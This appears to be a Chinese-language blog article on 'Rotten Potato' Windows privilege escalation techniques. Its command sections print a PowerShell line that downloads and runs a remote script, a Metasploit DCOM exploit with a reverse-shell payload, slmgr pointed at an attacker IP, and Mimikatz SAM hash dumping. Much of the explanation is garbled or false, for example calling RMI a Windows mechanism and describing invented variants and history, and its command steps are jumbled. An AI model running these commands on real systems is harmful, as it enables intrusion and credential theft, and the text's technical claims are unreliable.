一、爛馬鈴薯提權原理
爛馬鈴薯提權是一種利用Windows系統漏洞獲得系統管理員權限的技術手段。它利用了Windows操作系統上DCOM服務(分佈式組件對象模型)的一個漏洞,通過改寫註冊表數據,然後構造數據包,遠程執行程序,從而獲得系統管理員權限的攻擊方法。
實際上,利用DCOM服務的漏洞來提權的方式並不是爛馬鈴薯提權這個家族首創的,早在2003年,俄羅斯黑客d_know通過分析Windows XP漏洞,利用dcomcnfg.exe,注入dll文件,最終獲得了管理員權限,這也是最早的DCOM提權攻擊。
二、哥斯拉 馬鈴薯提權
哥斯拉馬鈴薯提權(Godzilla Potato)是爛馬鈴薯提權家族的一員,在爛馬鈴薯提權的基礎上,進一步提高了攻擊的成功率。哥斯拉馬鈴薯提權利用了Windows操作系統會自動查找可用代理的功能。攻擊者可以利用一個特殊的代理服務器來干擾這一功能,從而讓Windows選擇攻擊者控制的代理服務器,實現提權。
三、爛馬鈴薯提權命令
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS16-032/ms16-032_Kernel_Pool.html') msfconsole use exploit/windows/dcerpc/ms03_026_dcom set RHOST IPADDR set PAYLOAD windows/meterpreter/reverse_tcp exploit
四、爛馬鈴薯提權工具
爛馬鈴薯提權最為經典的工具當然是metasploit,而Black-hole的「魔改工具」也比較實用,它加入了多線程功能提高了攻擊成功率。但是由於這些工具可能會被殺軟攔截,攻擊者可以使用一些威力更小的輕量級工具,例如GadgetToJScript、PowerSploit等。
五、爛馬鈴薯提權的原理詳解
爛馬鈴薯提權所利用的漏洞源自於Windows RMI(遠程方法調用)機制的實現方式。由於Windows系統默認啟用了DCOM服務,而DCOM協議基於RMI,因此這兩者之間常常會出現安全漏洞。攻擊者可以通過RMI註冊表的許多漏洞之一來攻擊Windows系統登入。
六、馬鈴薯提權原理
爛馬鈴薯提權是馬鈴薯提權的一種變體,但它與其他馬鈴薯提權方法不同,它利用的是Windows系統不嚴密的RPC(遠程過程調用)實現方式。攻擊者可以通過RPC服務,對Windows操作系統全面地進行操控,例如枚舉本地口令哈希、執行遠程代碼等。
七、馬鈴薯家族提權
馬鈴薯家族提權實際上是馬鈴薯提權的進一步延伸,因為它包括了非常多的利用Windows系統漏洞的攻擊方式。例如,Windows操作系統XP、7等版本存在的漏洞,通過利用NTLM哈希也可以成功提權。因此,馬鈴薯家族提權也成為了黑客攻擊Windows操作系統的重要兵器。
八、馬鈴薯提權利用dcom提權的
cscript C:\windows\system32\slmgr.vbs /skms ip(攻擊者ip) cscript C:\windows\system32\slmgr.vbs /ato 4、 mmc.exe -Filepath C:\windows\system32\compmgmt.msc -windows下Component Services --計算機 ---DCOM ----combrok ------屬性 -------常規 --------下面的"Rpc工廠:允許遠程服務器的RPC" powershell Import-Module .\Mimikatz.ps1 invoke-mimikatz "lsadump::sam" 「exit」
原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/228831.html